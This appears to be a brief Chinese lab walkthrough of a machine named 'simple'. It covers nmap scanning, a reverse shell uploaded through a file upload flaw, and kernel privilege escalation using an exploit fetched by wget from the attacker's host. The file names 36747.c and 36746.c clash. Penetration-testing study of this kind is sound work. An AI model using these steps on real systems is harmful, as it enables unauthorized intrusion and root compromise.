simple

扫描2遍，以防有漏下的端口

确实只有80端口

 

nmap -sT -sV -sC -O -p80 192.168.1.5

 

nmap --script=vuln -p80 192.168.1.5

看一下有什么基漏洞

是一个任意文件上传的漏洞

能任意上传文件就可以上传我的反弹shell

先下下来看一下

 

远程上传漏洞

他有5步

 

跟着他的步骤

随便注册一个

 

 

 

写个简单shell

 

上传文件

 

第6步去访问路径

 

访问uploads路径

同时开启监听

点击avatar_abc_Evil.php

 

弹回shell

 

没有任何特权

 

版本

 

有没有自动任务

没有

 

要在内核提权上做一些考量

searchsploit kernel 3.16.0-30

 

提权都是失败

使用36747.c这个

 

wget http://192.168.1.128/36746.c

下载下来

根据他的说明编译一下

 

 

提权成功